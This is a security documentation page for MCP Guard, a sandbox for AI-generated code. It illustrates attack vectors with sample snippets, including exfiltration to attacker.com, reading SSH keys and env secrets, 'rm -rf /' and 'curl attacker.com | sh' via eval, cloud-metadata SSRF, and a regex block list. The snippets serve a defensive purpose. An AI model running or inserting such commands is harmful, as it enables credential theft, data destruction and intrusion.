MCP GuardMCP Guard

Security Analysis

Deep dive into attack vectors and how MCP Guard protects against them.

Executive Summary

MCP Guard creates a zero-trust execution environment by combining:

  1. V8 Isolate sandboxing - OS-level process isolation
  2. Network isolation (default) (globalOutbound: null) - Deny outbound by default, with optional per-MCP allowlists
  3. Binding-based access control - Explicit, scoped permissions
  4. Code validation - Pre-execution security checks
  5. Disposable execution environments - No state persistence between runs
  6. API key hiding - Credentials never exposed to executing code

Attack Vectors Protected Against

1. Data Exfiltration via Network Requests

// Malicious AI-generated code trying to steal data
const sensitiveData = await mcp.get_customer_data({ id: "12345" });
 
// Attempt to exfiltrate
await fetch("https://attacker.com/steal", {
  method: "POST",
  body: JSON.stringify(sensitiveData)
});

2. Credential Theft & API Key Leakage

// Malicious code trying to discover API keys
console.log(process.env.GITHUB_TOKEN);
console.log(process.env.OPENAI_API_KEY);
console.log(JSON.stringify(process.env));
 
const keys = Object.keys(process.env)
  .filter(k => k.includes('KEY') || k.includes('TOKEN'));

3. Filesystem Access & Data Theft

// Malicious code trying to read sensitive files
const fs = require('fs');
const sshKeys = fs.readFileSync('/home/user/.ssh/id_rsa', 'utf8');
const envFile = fs.readFileSync('/app/.env', 'utf8');

4. Arbitrary Code Execution via eval()

// Malicious code trying to execute arbitrary commands
const userInput = "require('child_process').execSync('rm -rf /')";
eval(userInput);
 
// Or using Function constructor
const malicious = new Function("require('child_process').exec('curl attacker.com | sh')");
malicious();

5. Server-Side Request Forgery (SSRF)

// Malicious code trying to access internal resources
await fetch('http://169.254.169.254/latest/meta-data/'); // AWS metadata
await fetch('http://localhost:6379'); // Redis
await fetch('http://internal-database:5432'); // Internal DB
await fetch('http://192.168.1.1/admin'); // Internal network

6. Denial of Service (DoS) via Resource Exhaustion

// Memory exhaustion
const bigArray = [];
while (true) {
  bigArray.push(new Array(1000000).fill('x'));
}
 
// CPU exhaustion
function fibonacci(n) {
  if (n <= 1) return n;
  return fibonacci(n - 1) + fibonacci(n - 2);
}
fibonacci(1000000);

7. Supply Chain Attacks via Malicious Dependencies

// AI imports malicious package
import { maliciousFunction } from 'evil-package';
 
// Malicious package tries to:
// - Steal environment variables
// - Make network requests
// - Execute shell commands
maliciousFunction();

8. Prototype Pollution

// Malicious code trying to pollute prototypes
Object.prototype.isAdmin = true;
Array.prototype.includes = () => true;
 
// Now all objects have isAdmin = true
const user = {};
console.log(user.isAdmin); // true (polluted)

Security Comparison

Traditional MCP Tool Calling

Attack VectorProtection Level
Network exfiltration⚠️ Limited
Credential theft⚠️ Limited
Filesystem access⚠️ Limited
Code injection❌ None
Resource exhaustion⚠️ Limited
SSRF❌ None

MCP Guard

Attack VectorProtection Level
Network exfiltrationComplete
Credential theftComplete
Filesystem accessComplete
Code injectionStrong
Resource exhaustionStrong
SSRFComplete

What Still Requires Vigilance

Not Fully Protected

These vectors require additional monitoring or MCP-level protections:

Logic Bombs in MCP Servers

If the MCP server itself is compromised, the binding will execute malicious operations.

Mitigation:

  • Audit MCP server code
  • Use only trusted MCP servers
  • Implement MCP call monitoring
  • Rate limiting on MCP operations

Data Poisoning via MCP Calls

Malicious code can still call legitimate MCP operations with malicious parameters.

// Legitimate MCP call, malicious parameters
await mcp.send_email({
  to: 'everyone@company.com',
  subject: 'Spam',
  body: 'Malicious content'
});

Mitigation:

  • Implement rate limiting
  • Add approval workflows for sensitive operations
  • Monitor MCP usage patterns

Resource Exhaustion via Legitimate MCP Calls

Code can abuse legitimate MCP operations to exhaust resources.

// Legitimate but abusive
for (let i = 0; i < 1000000; i++) {
  await mcp.create_issue({ title: `Issue ${i}` });
}

Mitigation:

  • Rate limiting on MCP calls
  • Cost tracking and budgets
  • Operation quotas per execution

Best Practices for Implementation

Code Validation Rules

const DANGEROUS_PATTERNS = [
  /require\s*\(/g,           // Block require()
  /import\s+.*from\s+['"](?!\.)/g, // Block external imports
  /eval\s*\(/g,              // Block eval
  /Function\s*\(/g,          // Block Function constructor
  /process\./g,              // Block process access
  /__dirname/g,              // Block __dirname
  /__filename/g,             // Block __filename
  /child_process/g,          // Block child_process
];

Worker Configuration

const workerConfig = {
  compatibilityDate: '2025-06-01',
  // Default: deny outbound network
  globalOutbound: null,
 
  // Optional (per MCP): allow outbound and enforce a host allowlist in the isolate
  // globalOutbound: 'allow',
  env: {
    MCP_BINDING: ctx.exports.MCPBinding({ props })
  },
  memoryLimit: '128MB',
  cpuLimit: '1s',
};

Rate Limiting

const rateLimiter = {
  maxExecutionsPerMinute: 60,
  maxMCPCallsPerExecution: 100,
  maxExecutionTimePerHour: 1800000, // 30 minutes
};

Key Takeaways

What You're Protected Against:

  • ✅ Network-based data exfiltration
  • ✅ Credential theft
  • ✅ Filesystem access attacks
  • ✅ SSRF attacks
  • ✅ Code injection
  • ✅ Supply chain attacks
  • ✅ Cross-execution contamination
  • ✅ Resource exhaustion (with limits)
  • ✅ Prototype pollution (per-execution)

The Bottom Line:

Code Mode + Worker Isolates creates a highly secure execution environment that protects against the vast majority of common attack vectors. It's orders of magnitude more secure than traditional approaches while maintaining the flexibility to execute arbitrary AI-generated code.

The key insight: Even if malicious code is generated and executed, it can't escape the sandbox or access anything it shouldn't.

Previous

How It Works

On this page